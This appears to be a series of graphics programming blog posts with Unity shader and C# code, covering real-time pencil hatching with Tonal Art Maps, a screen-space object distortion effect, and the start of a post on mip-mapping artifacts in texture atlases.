Before we do anything though, we need to talk about the basic theory behind real time hatching. The whole effect is based on the concept of Tonal Art Maps (or TAMs). These are a series of textures which correspond to how you want your art to like at different lighting intensities. The tricky part about them is that in order for things to look right, each texture needs to contain all the information stored in all the maps which correspond to brighter tones within them. So your second brightest map needs to contain all the texture data of your brightest, plus the additional data that makes this map darker.

This is sorta complicated when stated in words, but it’s a lot more intuitive when you see the textures. The following was taken from a widely cited research paper (located here which presented the technique we’re going to use today.

As you can see, each map represents pencil strokes that an artist would make to shade in a part of a piece of paper. The darker maps contain all the pencil strokes from the brighter regions, and then add more. If you don’t follow this rule when creating your maps, the strokes won’t nicely flow into each other, and you’ll end up with very weird looking line shading.

In order for us to have a “proper” TAM, we need to go a step further than simply authoring our hatching textures according to the above rules, we also need to provide custom mips. If you don’t, then as your objects get farther away, you’re going to see less and less stroke detail on them. The paper goes into detail as to how they generated the custom mips, and provides an example of what they made:

from http://hhoppe.com/hatching.pdf

I’m actually going to skip all of this custom mip texture generation stuff, because I don’t feel like creating my own TAM generator, given that my interest in this effect was really just in figuring out how it worked, not using it for a commercial product. Suffice to say, I’m sure it would look better if you spend the time to create the custom mips. If you want to get a look at a working TAM generator, I found one written in processing here

Ok, that was a lot of writing for not a lot of output, but now that we have our TAM images, we can proceed with actually creating the effect.

A Single Object Shader

So now that we have our TAM, we need to create a shader that uses them. The paper that I cited earlier presents a method for applying a set of TAMs to an object using 6 texture lookups, because (importantly), you could pack those 6 lookups into two texture accesses. This is an important thing to dwell on for a second, because it gets missed a lot of the time when people post real time hatching shaders: DO NOT add 6 texture lookups to your shader for hatching. Pack the textures into the channels of 2 RGB textures instead.

To pack the TAM textures together, I wrote a quick and dirty Unity tool. The code is a bit long to paste here, but it’s available on the github repo linked at the end of the post, or in the gist here.

I used that tool to combine the above 6 TAM images into the following:

Which is much more space efficient! Now we need to look at how the shader is going to work.

Obviously we’re going to be blending between the 6 channels in our two textures, but how we do it is pretty nifty. Before we get started though, let’s get the basic skeleton of our shader out of the way. Remember that for now, we’re going to be writing a shader that we can apply to a single object. Here’s the setup:

sampler2D _MainTex;
float4 _MainTex_ST;

sampler2D _Hatch0;
sampler2D _Hatch1;
float4 _LightColor0;

v2f vert (appdata v)
{
    v2f o;
    o.vertex = mul(UNITY_MATRIX_MVP, v.vertex);
    o.uv = v.uv * _MainTex_ST.xy + _MainTex_ST.zw;
    o.nrm = mul(float4(v.norm, 0.0), unity_WorldToObject).xyz;
    return o;
}

fixed4 frag (v2f i) : SV_Target
{
    fixed4 color = tex2D(_MainTex, i.uv);
    half3 diffuse = color.rgb * _LightColor0.rgb * dot(_WorldSpaceLightPos0, normalize(i.nrm));

    //hatching logic goes here

    return color;
}

The complete source for the effect is available on github here, but hopefully the above is enough to get us all on the same page. All we have here is a standard diffuse shader. While you will likely need more than a single directional light in a real project, the hatching logic works well with any light input, so I’m going with a simple case here.

The first thing we need to do is to get a scalar representation of how bright our fragment is with all the lighting applied. This just requires a dot product against a vector constant (0.2326, 0.7152, 0.0722).

half intensity = dot(diffuse, half3(0.2326, 0.7152, 0.0722));

This constant comes from the luminosity function, and in theory requires that the colour we’re multiply it against has been converted to linear space. Depending on what platform you’re on, you may or may not care about this. For simplicity I’m going to omit it, just be aware that light most lighting calculations, if you aren’t working with linear colour, you’re sacrificing correctness in favor of performance.

Also note that we’re calculating this value in halfs. While you likely wouldn’t see too much of a difference with a fixed precision variable, an 11 bit fixed precision variable is only accurate to about 0.0039 (or 1/256), and the luminosity constant we’re using requires more precision to accurately represent. If you’re splitting hairs, you can’t store 0.7152 completely correctly in a half either, but it’s off by much, much less (if you’re interested, more info on half precision vars can be found here).

If we add that line to our shader, and output the result, we’ll end up with a nice grayscale effect:

Now all we need to do is to convert that scalar intensity value into a hatch texture sample. We have 6 hatch channels, which means that there are going to be 6 different intensity values that will map to a sample from only 1 hatch texture (1/6, 2/6, 3/6, 4/6, 5/6, 6/6). Any value that isn’t one of these exact values is going to require us to blend between the two textures that our value is between. This means that an intensity value of 1.5 / 6 (or 0.25) will require us to blend between the texture that corresponds to 1/6 and 2/6. This is demonstrated in the diagram below.

Unfortunately for us, GPUs (or at least, mobile GPUs) aren’t great at branching logic. So while it seems straightforward to write this with a few if statements like so:

fixed3 rgb;
if (intensity > 1.0 && intensity < 2.0)
{
    fixed3 hatch = tex2D(hatch0, uv);
    rgb += hatch.r * (1.0 - intensity);
    rgb += hatch.g * intensity;
}
else if (intensity == 2.0)
{
    rgb = tex2D(hatch, uv).g;
}
else if ...

We really, really, don’t want to do that in our shader, since it would mean a big unnecessary performance penalty. Instead, what we want is to write something that looks like this:

fixed3 rgb;
fixed3 hatch = tex2D(hatch0, uv);
rgb += hatch.r * weight0;
rgb += hatch,g * weight1;
rgb += hatch.b * weight2;
...

Notice how in both cases we end up doing the same number of texture samples, but the second case contains no branching at all. What we need to do is calculate the weights we multiply by so that we only take data from the hatch textures we want to use. It would also be nice if those weights could be created such that the sum of the weights for the textures we want added up to 1, while the weights for the other hatch samples stayed at 0.

Let’s look at how to do this. Again, we have 6 textures that we need to calculate weights for, so it stands to reason that we’re going to need to compare our intensity value against 6 numbers to determine these weights. We are going to store the difference between our intensity and each of these comparing values in 2 half3s. It’s going to look like this:

half i = intensity * 6;
half3 intensity3 = half3(i,i,i);
half3 weights0 = intensity3 - half3(0,1,2);
half3 weights1 = intensity3 - half3(3,4,5);

There’s a few things to talk about in the above snippet. First of all, why am I using integer steps instead of decimal 1/6 steps? This is to avoid multiple divisons by 6 later on. We know that at most, we’re going to have 2 weights which are non zero, and those two weights need to add up to 1, so as long as the step between each weight is 1, we can simply lerp between them and get our final answer. Note that for this to work, we also need to multiply our intensity value by 6.

Let’s step through the above with a sample intensity value of 0.75

half i = 0.75 * 6; // 4.5
half3 intensity3 = half3(i,i,i); //(4.5,4.5,4.5)
half3 weights0 = intensity3 - half3(0,1,2); //(4.5,3.1,2.5)
half3 weights1 = intensity3 - half3(3,4,5); //(1.5,0.5,-0.5)

Gross, we have some weight values that are outside of our 0-1 range, that’s not going to do us any favours later on, so let’s wrap our math in saturate calls and try that again.

half i = 0.75 * 6; // 4.5
half3 intensity3 = half3(i,i,i); //(4.5,4.5,4.5)

half3 weights0 = saturate(intensity3 - half3(0,1,2));
// weights0 = (1,1,1)

half3 weights1 = saturate(intensity3 - half3(3,4,5));
//weights1 = (1,0.5,0)

Ok, that’s more useful! Kinda, there’s still a few things to take care of here. For one, we said we needed a maximum of 2 non zero weights, and we have 5 right now. What we need to do is get rid of the weights for our lower values, so that the only ones remaining are for the two textures we actually want. We also want those two remaining weights to add up to 1.

Luckily all it takes is a bit of subtraction to fix everything up:

weights0.xy -= weights0.yz;
weights0.z -= weights1.x;
weights1.xy -= weights1.yz;

Nifty right? Using our example value of 0.75, this would give us two weight vectors: (0,0,0) and (0.5, 0.5, 0.0), which means that an input of 4.5 is a 50% blend of our 4th and 5th texture samples, which is exactly what we want to do!

So now that we have our weights, the rest is just some Multiply/Add operations:

half3 hatching = half3(0.0, 0.0, 0.0);
hatching += hatch0.r * weightsA.x;
hatching += hatch0.g * weightsA.y;
hatching += hatch0.b * weightsA.z;
hatching += hatch1.r * weightsB.x;
hatching += hatch1.g * weightsB.y;
hatching += hatch1.b * weightsB.z;

Which we can further optimize by vectorizing the multiplications before we add things together:

half3 hatching = half3(0.0, 0.0, 0.0);
hatch0 = hatch0 * weightsA;
hatch1 = hatch1 * weightsB;

half3 hatching = hatch0.r +
    hatch0.g + hatch0.b +
    hatch1.r + hatch1.g +
    hatch1.b;

There are two things to note in the above. The first is how we’re handling black. Because our effect relies on keeping the relationship of less light == denser pencil strokes, we can’t treat black as a separate texture sample, because when we move between our darkest texture and pure black we won’t be adding any more strokes. Instead, when we’re blending between our darkest two texture samples, what we’re really doing is (darkestTexture * 1.0 - i) + (2ndDarkest * i). This is expressed above but it isn’t immmediately obvious.

Second, you may have realized that the above all relies on a very big assumption: that our intensity will never exceed 1.0. Of course this is nonsense, but assuming it up until now has both made our math easier, and given us a fun hack to let us go to pure white when being lit very brightly. At the beginning of our math, we just need to store max(0, intensity - 1.0), and add it back at the end. For values less than 1.0, this is going to be zero and for anything super bright, it’s going to push us into pure white territory.

Altogether, the hatching function looks like this:

fixed3 Hatching(float2 _uv, half _intensity)
{
    half3 hatch0 = tex2D(_Hatch0, _uv).rgb;
    half3 hatch1 = tex2D(_Hatch1, _uv).rgb;

    half3 overbright = max(0, _intensity - 1.0);

    half3 weightsA = saturate((_intensity * 6.0) + half3(-0, -1, -2));
    half3 weightsB = saturate((_intensity * 6.0) + half3(-3, -4, -5));

    weightsA.xy -= weightsA.yz;
    weightsA.z -= weightsB.x;
    weightsB.xy -= weightsB.yz;

    hatch0 = hatch0 * weightsA;
    hatch1 = hatch1 * weightsB;

    half3 hatching = overbright + hatch0.r +
    	hatch0.g + hatch0.b +
    	hatch1.r + hatch1.g +
    	hatch1.b;

    return hatching;
}

If we plug that into our pixel shader like so:

fixed4 frag (v2f i) : SV_Target
{
    fixed4 color = tex2D(_MainTex, i.uv);
    fixed3 diffuse = color.rgb * _LightColor0.rgb * dot(_WorldSpaceLightPos0, normalize(i.nrm));

    fixed intensity = dot(diffuse, fixed3(0.2326, 0.7152, 0.0722));

    color.rgb =  Hatching(i.uv * 8, intensity);

    return color;
}

We end up with a lovely hatch material:

Last thing to note here is that I’m multiplying the input UVs by 8 when I pass them to the hatch function. This is purely a hack because I think it looks better with the hatch textures I’m using. YMMV, especially if you’re generating your own TAM.

A Post Processing Effect

So now that we have the basic effect, it’s time to do something more exciting with it. Moving this to a post effect makes it much easier to use in a project, and do fun things like integrate with other effects, like a vignette:

But for now, I’m just going to walk through turning this into a plain old full screen sketch effect:

This is surprisingly straightforward. We’re already rendering the entire scene with lighting in our main pass, which means that we can pull our intensity value from there. This has the advantage of letting us sketchify scenes using complicated materials or Unity’s dynamic GI without us having to think about anything. Other than that, about the only thing we need is the UVs of the objects we’re shading.

But as is usually the case with graphics, we need to do a bit of setup first:

[RequireComponent(typeof(Camera))]
public class PencilSketchPostEffect : MonoBehaviour
{
public float bufferScale = 1.0f;
public Shader uvReplacementShader;
public Material compositeMat;

private Camera mainCam;
private int scaledWidth;
private int scaledHeight;
private Camera effectCamera;

void Start ()
{
    Application.targetFrameRate = 120;
    mainCam = GetComponent<Camera>();

    effectCamera = new GameObject().AddComponent<Camera>();
}

void Update()
{
    bufferScale = Mathf.Clamp(bufferScale, 0.0f, 1.0f);
    scaledWidth = (int)(Screen.width * bufferScale);
    scaledHeight = (int)(Screen.height * bufferScale);
}

If you’re familiar with my previous posts, this should look very familiar. All we’re doing is setting up our effect to use a second camera, and updating some variables to scale any buffers we need to create. Simple stuff. The fun starts inside OnRenderImage:

private void OnRenderImage(RenderTexture src, RenderTexture dst)
{
    effectCamera.CopyFrom(mainCam);
    effectCamera.transform.position = transform.position;
    effectCamera.transform.rotation = transform.rotation;

    //redner scene into a UV buffer
    RenderTexture uvBuffer = RenderTexture.GetTemporary(scaledWidth, scaledHeight, 24, RenderTextureFormat.ARGBFloat);
    effectCamera.SetTargetBuffers(uvBuffer.colorBuffer, uvBuffer.depthBuffer);
    effectCamera.RenderWithShader(uvReplacementShader, "");

    compositeMat.SetTexture("_UVBuffer", uvBuffer);

    //Composite pass with packed TAMs
    Graphics.Blit(src, dst, compositeMat);

    RenderTexture.ReleaseTemporary(uvBuffer);
}

Again, mostly, this is all the same as previous effects. We copy the settings we need from the main camera to the effect camera, create our temporary buffer to render UVs into, and then render the scene UVs.

Once we have our UV buffer populated, we pass it to our composite shader, which does the rest of the work.

It’s very easy to make a mistake when rendering the UV buffer. With UVs, we need much more precision than we can store in a default RT texel. Remember earlier when I was talking about needing to store the luminosity constant in a half3 because a fixed3 didn’t have enough precision? That goes double for UVs. If you forget about this and try output your UVs to a regular buffer, you end up with a mess:

Wrong Precision Left, Correct Precision Right

Since we’re going to use a floating point buffer, that means that our fragment shader needs to return a float, so our UV replacement shader looks like this:

float4 frag (v2f i) : SV_Target
{
    float2 uv = i.uv;

    return float4(i.uv.x, i.uv.y, _MainTex_ST.x, _MainTex_ST.y);
}

I’m also taking the time here to output the tiling and offset info from the main texture so that we can use it later to (hopefully) get a more accurate effect.

Finally, the composite shader is very simple, now that you know what the hatching function is:

fixed4 frag (v2f i) : SV_Target
{
    fixed4 col = tex2D(_MainTex, i.uv);

    float4 uv = tex2D(_UVBuffer, i.uvFlipY);

    half intensity = dot(col.rgb, float3(0.2326, 0.7152, 0.0722));

    half3 hatch =  Hatching(uv.xy * 8, intensity);

    col.rgb = hatch;

    return col;
}

Speaking of precision though, you’ll notice that using the above code, the hack we used earlier to have very bright objects go to white no longer works, this is again because of buffer precision: the buffer that our main camera is rendering to only stores values up to 1.0, so that extra information is getting clipped before it gets to us. You can certainly make it happen - you’ll need the main camera rendering into a high precision buffer, and you’ll need the shaders on individual elements to output halfs or floats - but this violates our principle of not requiring changes to the shaders objects are using, therefore I’m calling it outside the scope of this post.

Performance

On an iPhone 6, rendering the scene you see in the gif at the beginning of the post with a htaching shader on each robot was blazing fast (almost exactly the speed that rendering them with a diffuse shader was). However, turning on the post effect added 4 ms to the render time. This is likely due to the fact that we’re performing 4 texture lookups (main cam, uv buffer, 2 hatch textures) and a not insignificant amount of math inside the composite shader (which operates at full res).

I didn’t do any performance testing on desktop, mostly because after working in mobile for half a decade, it’s just easier for me to grab the numbers off of a phone. My gut says that anything a phone can do in 4 ms, my laptops can do in basically no time, but I’m basing that on basically nothing but a hunch.

Conclusion

Firstly, all the code that I talked about is available on github. It’s GPL’ed because to the best of my knowledge, the hatch images I found were released under the GPL.

There are lots of potential issues you’ll run into with this effect if you use it in a real project. For example, handling non uniform object scale can present some odd issues, especially if you don’t want to break static batching by passing scale to the object’s material. I think you could get around this by encoding the scale of objects into their vertex color, but if you know the scale of your object at bake time, you should probably just resize your mesh.

In reality though, the effect as presented here is likely not going to make your art team very happy. I think you’d likely run into artists wanting to author custom TAMs with different types of strokes, and maps for each object to control which type of stroke was used where.

That about wraps things up, this was a lot of fun! If you have any questions, shoot me a message on twitter, I’d love to see more projects using this type of effect, so send me screenshots of anything you build with it!

[Update: 5/18/2020: Thanks to @__seb for pointing out a typo in the hatching shader]

Distorting Object Shapes in Screen Space

2017-02-06T00:00:00+00:00

Today I’m going to walk through a different take on the distortion effect that I presented awhile ago in the post “Screen Space Distortion and a Sci-fi Shield Effect.” This time, instead of using distortion to see “through” an object, we are going to distort the shape of objects themselves. When it’s all done, it’s going to look something like this:

Pretty snazzy right? The tricky part of the effect isn’t the distortion, it’s in getting the edges of the distorted objects to sort “correctly”. Or…as correctly as the edge of an object distorted in screen space can.

All of this was done using Unity 5.5.x, so if you’ve arrived here from the future and are using a different version, you may have to tweak what I present here.

A High Level View of the Effect

Before we dive into the implementation details, here’s a quick outline of what we’re going to do to make this effect work:

Render all the non distorting objects into our main RenderTexture
Blit the RGB channels of that buffer into a lower res RT
Render the distorting objects (undistorted) into the lower res RT using a custom shader
Combine all of these buffers together to make the effect

Sounds fun right? Let’s get started.

Some Initial Set Up

The entire c# part of the effect is going to live on a single script that we’ll attach to the main camera, which we’ll get set up here.

I implemented this with two cameras, mostly so that I didn’t have to touch culling masks / settings on the main scene camera, which we use to get the color buffer that doesn’t have distorted objects in it. The script will create the second camera is the one we use to render the distorting objects.

private Camera cam;
private Camera maskCam;

public Material compositeMat;
public Material stripAlphaMat;

public float speed = 1.0f;
public float scaleFactor = 1.0f;
public float magnitude = 0.01f;

private int scaledWidth;
private int scaledHeight;
void Start ()
{

    cam                            = GetComponent<Camera>();
    scaledWidth             = (int)(Screen.width * scaleFactor);
    scaledHeight            = (int)(Screen.height * scaleFactor);

    cam.cullingMask         = ~(1 << LayerMask.NameToLayer("Distortion"));
    cam.depthTextureMode    = DepthTextureMode.Depth;

    maskCam                 = new GameObject("Distort Mask Cam").AddComponent<Camera>();
    maskCam.enabled         = false;
    maskCam.clearFlags      = CameraClearFlags.Nothing;
}

There are a few things to note here: First, we need to determine how big we want our distorted color buffer to be, so I’m mutliply the screen size by a float. This is important for optimizing the effect for low power devices. The smaller our second buffer is, the faster the effect will be, and the less memory it will use.

The other important thing to note is that I’m setting the depthTextureMode on the main camera. This is so that the camera will output a depth texture that we can see in our shaders, which we’re going to use to help us sort our distorting object later on.

The other boring bit I want to get out of the way is the update function:

void Update ()
{
   scaleFactor = Mathf.Clamp(scaleFactor, 0.01f, 1.0f);
   scaledWidth = (int)(Screen.width * scaleFactor);
   scaledHeight = (int)(Screen.height * scaleFactor);

   magnitude = Mathf.Max(0.0f, magnitude);
   Shader.SetGlobalFloat("_DistortionOffset", -Time.time * speed);
   Shader.SetGlobalFloat("_DistortionAmount", magnitude/100.0f);
}

Nothing really special here, we’re updating a bunch of values per frame so we can do things like change the scaling value at runtime, and we need to set a few shader parameters in order to update the distortion effect.

The rest of the logic for the effect is going to take place inside OnRenderImage:

private void OnRenderImage(RenderTexture src, RenderTexture dst)
{
//cool stuff goes here :)
}

If you attach this to your main camera and hit play right now, you’ll see a lovely abyss of black fill your screen. Stare into it for a moment before continuing below.

Rendering the DistortionRT

As mentioned above, the first thing we need to do in our OnRenderImage function is to get our RenderTextures filled with some colour (and depth!). Since we’re working in OnRenderImage, we already have the main camera’s output in RT form (the src argument in the function signature), but we need to get our low res colour buffer built up.

In the interest of simplicity, I'm going to refer to our low res RenderTexture as the "distortingRT," because we are going to render the things we want to distort into it.

Before we render our distorting objects however, we need to copy the contents of main RT’s RGB channels into the distortingRT. This will help eliminate ugly artifacts around the edges of our wobbly GameObjects which get caused because we’re using a lower resolution image to grab their colours from. This artifact ends up looking like this:

We also need to output a specific constant into the alpha channel of the distortingRT. We are going to be using the alpha channel as a low resolution depth buffer to let us sort our distorting objects with the ones seen by the main camera, but before we do that, we need a clean slate to work with, so we need to fill the alpha channel of distortingRT with a value that represents the farthest depth possible (the far clip plane).

This is simple, but only if you’re aware of how different platforms handle depth. On some platforms (DX11/12 and Metal for example), the depth buffer goes from 1 to 0, with 1 (or white) being the closest objects, and 0 being the edge of the far plane. Other platforms (like OpenGL) go from 0 to 1. We need our shader to output the farthest depth value possible for anywhere that doesn’t contain a distorting object, so we need to output different values per platform.

Luckily, Unity has a handy preprocessor define to let us know which platform we’re using:

fixed4 frag (v2f i) : SV_Target
{
	fixed4 col = tex2D(_MainTex, i.uv);

#if UNITY_REVERSED_Z
    col.a = 0.0;
#else
    col.a = 1.0;
#endif
	return col;
}

If you aren’t familiar enough with image effect shaders to use the above snippet, the entire source for this article can be found here, but as the rest is mostly boiler plate, I’m not going to include it here.

With our shader built, we can use that to copy what we need from one buffer to the other:

private void OnRenderImage(RenderTexture src, RenderTexture dst)
{
    RenderTexture distortingRT = RenderTexture.GetTemporary(scaledWidth, scaledHeight, 24);
    Graphics.Blit(src, distortingRT, stripAlphaMat);
}

You’ll notice that instead of allocating the distortingRT earlier, we’re grabbing it here using RenderTexture.GetTemporary. The Unity docs have this to say:

If you are doing a series of post-processing “blits”, it’s best for performance to get and >release a temporary render texture for each blit, instead of getting one or two render >textures upfront and reusing them.

So that’s what we’ll do! We just have to remember to release the texture at the end of the function, otherwise we’re going to allocate a lot of RTs very quickly.

Rendering the Distorting Objects

Next we need to render the things we want to distort into the distortingRT. There’s not really much special about doing this, except that I make sure to re-set up my camera parameters every frame so that other scripts can’t accidentally mess up our rendering.

private void OnRenderImage(RenderTexture src, RenderTexture dst)
{
    RenderTexture distortingRT = RenderTexture.GetTemporary(scaledWidth, scaledHeight, 24, RenderTextureFormat.ARGBFloat);
    Graphics.Blit(src, distortingRT, stripAlphaMat);

    maskCam.CopyFrom(cam);

    maskCam.clearFlags = CameraClearFlags.Depth;
    maskCam.gameObject.transform.position = transform.position;
    maskCam.gameObject.transform.rotation = transform.rotation;
    maskCam.cullingMask = 1 << LayerMask.NameToLayer("Distortion");
    maskCam.SetTargetBuffers(distortingRT.colorBuffer, distortingRT.depthBuffer);

    maskCam.Render();
}

If you aren’t on a platform that gives you access to floating point textures, you can actually use a RenderTextureFormat.Default here, but since you’ll have so little precision in your alpha channel, distorting objects won’t sort correctly as they get farther away from the camera. For relatively small scenes (like a single room) this likely won’t be noticeable, but you’ll start to see more artifacts as your environment gets larger.

If you take a peek at your distortingRT in the inspector, you should see your distorting objects being rendered on top of a copy of what the main camera sees. In the image below, the robots are actually located behind the other geometry in world space, but they are rendered in front of it for the purposes of the distortion buffer.

This is expected and important. If we let our distorting objects sort now, then when an object is partly occluded, we won’t have all the colour information we need to distort the object behind the occluder, leading to artifacts along the edges of occluding objects. So to address this, we’re going to let our objects render on top of everything now, and manually do the depth sorting later. It’s fun! And speaking of rendering our distorting objects, I think now is as good a time as any to talk about what needs to be in the shaders that the distorting object use.

The Distorting Object Shader

For the most part, this effect can work with any shader you want, provided you can make a small modification to the alpha output. For opaque shaders this is likely not an issue, since they don’t use the alpha channel for anything. Since transparent shaders use their alpha for blending, they’ll need a second pass to write the alpha.

As mentioned earlier, we’re going to use the alpha channel of distortingRT as a depth buffer, so that we can access them in our composite shader to do the depth sorting I was just talking about, so we need our distorting materials to output their depth into the alpha channel. Again, this isn’t a terribly complicated thing to do, but we need to be aware of platform specific differences in handling depth and clip space.

First though, we need to get the data we need from our vertex shader to the fragment. This isn’t too difficult, since all we need are the z and w components of your transformed position vector (assuming you’re transforming it by the MVP, like so):

o.pos = mul(UNITY_MATRIX_MVP, v.vertex);

The Z component of this vector is what I think about when I think of depth, it represents the distance from the camera. Unfortunately this value can be well outside the 0 to 1 range that we need to be able to encode it into an alpha channel. To fix that, we can divide by the W component of the position vector, which will get us depth represented in relation to the view frustum. In DirectX, this is going to get us a value of between 0 and 1, with 1 being the far clip, and 0 being the near clip. In OpenGL, which uses a different sort of projection matrix, we’re going to end up with a value of between -1 and 1. So we need to do some quick math to make sure we don’t try to put a negative value into our texture:

float4 frag (v2f i) : SV_Target
{
//other shading logic fills RGB channels

col.a = (i.screen.z / i.screen.w);

//using UNITY_REVERSED_Z becuase SHADER_TARGET_GLSL
//doesn't seem to work on my machine
#if !defined(UNITY_REVERSED_Z)
    col.a = (col.a + 1.0) * 0.5;
#endif
    return col;
}

With that modification to your shaders, if you render only the alpha channel of your distortingRT, it should look something like this:

The Composite Shader

Now all that’s left is to put this all together. The composite shader is going to be the most complicated shader we’ve talked about so far, so I’m going to provide more of the code than I have been. To start with, let’s look at the data we are going to pass the shader:

sampler2D _MainTex;
float4 _MainTex_ST;

sampler2D _DistortionRT;
sampler2D _CameraDepthTexture;

float _DistortionOffset;
float _DistortionAmount;

_MainTex is going to be the regular old colour buffer that the main camera sees, nothing special there. _DistortionRT is the buffer that we’ve been building up until now, with the RGB of our distorting objects, and their depths stored in the alpha channel.

_CameraDepthTexture is going to be the depth texture created by the main camera. This is a globally accessible resource that Unity will make for us, since we specified a depth texture mode for the main camera at the beginning of this post.

Finally, the two floating point values are to control the distortion effect. _DistortionOffset controls how fast the distortion effect moves, and as we saw earlier, is passed in as Time.time multiplied by a constant. The higher we set the constant value, the faster the distortion wiggles. _DistortionAmount is also passed in from our effect script, and controls how wide we want the distortion effect to be. Changing this value determines whether we have a subtle wobble or a spastic glitch effect.

Got it? good! I’m going to skip talking about the vertex shader because it’s just a passthrough:

v2f vert(appdata v)
{
	v2f o;
	o.vertex = mul(UNITY_MATRIX_MVP, v.vertex);
	o.uv = TRANSFORM_TEX(v.uv,_MainTex);
	return o;
}

So let’s jump directly to the good part, the fragment shader. First let’s get the values we need from the _MainTex and the _CameraDepthTexture:

fixed4 frag(v2f i) : SV_Target
{
    fixed4 screen = tex2D(_MainTex, float2(i.uv.x, i.uv.y));

    float2 distortUVs = i.uv;

#if defined(UNITY_UV_STARTS_AT_TOP) && !defined(SHADER_API_MOBILE)
	distortUVs.y = 1.0 - distortUVs.y;
#endif

    float d = tex2D(_CameraDepthTexture, distortUVs).r;

I wish I had a better explanation for the #ifdef section, but I don’t. Sometimes Unity accounts for the UV flip between platforms and sometimes it doesn’t. As far as I could tell, _MainTex is always right side up, and this set of defines will get us the correctly oriented UVs on whatever platform we’re using (I tested with GL, D3D11 and on an iPhone using Metal).

Other than that bit of engine specific weirdness, this should be pretty easy to follow so far. So let’s make it more complicated and grab our _distortionRT value.

float4 distort = tex2D(_DistortionRT, fixed2(distortUVs.x + sin((distortUVs.y + _DistortionOffset) * 100)*_DistortionAmount, distortUVs.y));

This is likely confusing. All the crazy UV math is because we want to apply the distortion effect here. So we use this math to grab the colour at the position that the distortion effect needs us to read from. I went over this in much more detail in my previous post so I’m not going to talk much more about this here. For today’s purposes, here’s what you need to keep in mind:

Using this UV math will distort the entire _DistortingRT buffer, so if we just returned this color, the entire screen would be distorted.
The alpha channel still contains depth

Now that we have these values, we need to finally depth sort our distorting objects. Luckily, we now have 2 depth values, so all we need to do is compare them. In cases where the depth from _DistortingRT is closer to the camera, we want to return the RGB from _DistortingRT, and otherwise, we want to return the regular old _MainTex. Pretty easy right?

#if UNITY_REVERSED_Z
	return lerp(screen, distort, distort.a > d);
#else
	return lerp(screen, distort, distort.a < d);
#endif

Remember that different platforms handle depth differently, so depending on which platform you’re on, your comparison will need to flip, as shown above.

The entire source for the composite fragment function is as follows:

fixed4 frag(v2f i) : SV_Target
{
    fixed4 screen = tex2D(_MainTex, float2(i.uv.x, i.uv.y));

    float2 distortUVs = i.uv;

#if defined(UNITY_UV_STARTS_AT_TOP) && !defined(SHADER_API_MOBILE)
    distortUVs.y = 1.0 - distortUVs.y;
#endif

    float4 distort = tex2D(_DistortionRT, fixed2(distortUVs.x + sin((distortUVs.y + _DistortionOffset) * 100)*_DistortionAmount, distortUVs.y));
    float d = tex2D(_CameraDepthTexture, distortUVs).r;

#if UNITY_REVERSED_Z
    return lerp(screen, distort, distort.a > d);
#else
    return lerp(screen, distort, distort.a < d);
#endif
}

All we need to do now is add the final blit to the effect script, which makes the completed OnRenderImage function look like so:

private void OnRenderImage(RenderTexture src, RenderTexture dst)
{
   RenderTexture distortingRT = RenderTexture.GetTemporary(scaledWidth, scaledHeight, 24, RenderTextureFormat.ARGBFloat);
   Graphics.Blit(src, distortingRT, stripAlphaMat);

   maskCam.CopyFrom(cam);
   maskCam.gameObject.transform.position = transform.position;
   maskCam.gameObject.transform.rotation = transform.rotation;

   //draw the distorting objects into the buffer
   maskCam.clearFlags = CameraClearFlags.Depth;
   maskCam.cullingMask = 1 << LayerMask.NameToLayer("Distortion");
   maskCam.SetTargetBuffers(distortingRT.colorBuffer, distortingRT.depthBuffer);
   maskCam.Render();

   //Composite pass
   compositeMat.SetTexture("_DistortionRT", distortingRT);
   Graphics.Blit(src, dst, compositeMat);

   RenderTexture.ReleaseTemporary(distortingRT);

}

Performance Thoughts, Other Considerations

So now we should have a working effect! If you’re lost with implementing any part of this, or were just too lazy to do it yourself, all the code for the effect is available on github here.

All that’s left to do is talk about some left over details that didn’t fit anywhere else, and performance. Luckily the performance talk is short - this is a pretty lightweight effect. With a scale factor of 0.5 (so the distortion buffer is half the resolution of the main camera’s), my iPhone eats this for breakfast. This will of course become more expensive the bigger your distortion buffer is, but on such a small screen you can probably get away with a half res buffer.

And if my phone can run this… I think it goes without saying that both my laptops barely noticed this effect. I don’t have numbers because everything ran this at 60 fps and I really didn’t care to spend my weekend trying to get any more granular than that.

The other thing to mention is what could be done to make this effect better! The sine wave distortion is fairly cheesy, but you could likely extend this to handle more interesting distortion patterns if you took a few concepts from my other post on screen space distortion.

Also, since this is all in screen space, objects that are farther away from the camera appear to be distorting at a higher magnitude than objects closer to your camera. You could probably account for this by scaling the distortion magnitude based on the distorting object’s depth, but I haven’t tried this out yet.

That’s all for now, shoot me a message on Twitter if you have any questions or are doing something with this effect :)

Minimizing Mip Map Artifacts In Atlassed Textures

2016-11-04T00:00:00+00:00

Since all my professional work is on mobile games, I spend a LOT of time working on tools and systems that can squeeze as much performance out of low powered hardware as possible. Perhaps unsurprisingly, one of these tools is texture atlassing, that is, packing multiple textures into a larger image, which ends up looking something like this:

That Texture Atlassing is a good idea isn’t really news. I’m not here to sell you on the benefits of doing it (although if I was, I’d mention things like fewer texture state changes, improved batching, lower memory usage, and the ability to use NPOT textures on ES2 hardware), what I am here to do is to walk through how to build a good one.

There are a lot of tutotials and texture atlassing options out there already, but they all seem targetted at people making 2D games or using them for UI. While these are perfectly good use cases, they often ignore one of the harder problems when you’re working with Texture Atlasses: mip mapping. If you’ve ever atlassed a 3D scene (which is a very VERY good idea on mobile), you’ve probably noticed some ugly texture seams when your camera pulls back:

(I didn't use the atlas in the first picture to make this one)

This is what it looks like when your texture atlasser isn’t build to handle mip mapping. Notice how in the distance, there starts to be weird colours (from an adjacent sprite in my atlas) polluting the appearance of our texture. Again, not applicable to UI or 2D things, but very applicable to what I do (3D), so today I thought I’d go over how write a texture atlasser that does solve these problems.

Brief Aside: What is Mip Mapping

Mip Mapping is a rendering technique which creates lower resolution versions of a texture, and swaps to these lower resolution textures based on how far away an object is from the camera. This is done both to increase rendering speed, and to improve rendering quality. Without mip mapping, as textures get farther away, then tend to start “shimmering”, which looks really unnatural, with mip mapping the renderer switches to a lower resolution (and essentially pre antialiased) version of the texture, which eliminates this shimmer:

If you’re using Unity, you’ve almost certainly been using mip maps the whole time without knowing it (although you may have wondered why the size of your images in memory was larger than you thought), and in most cases you never have to think about mip mapping at all. With texture atlassing, you do, and this is because mip maps are usually generated by taking the original image, and shrinking it by halving both dimensions of the texture. This is done multiple times, so a 512x512 texture will have mips with a width and height of 256,128,64,32,etc. This shrinking is done most often using a simple Bilinear Filter, which essentially averages a bunch of pixels in the high resolution image to determine what colour a pixel is in a lower resolution version

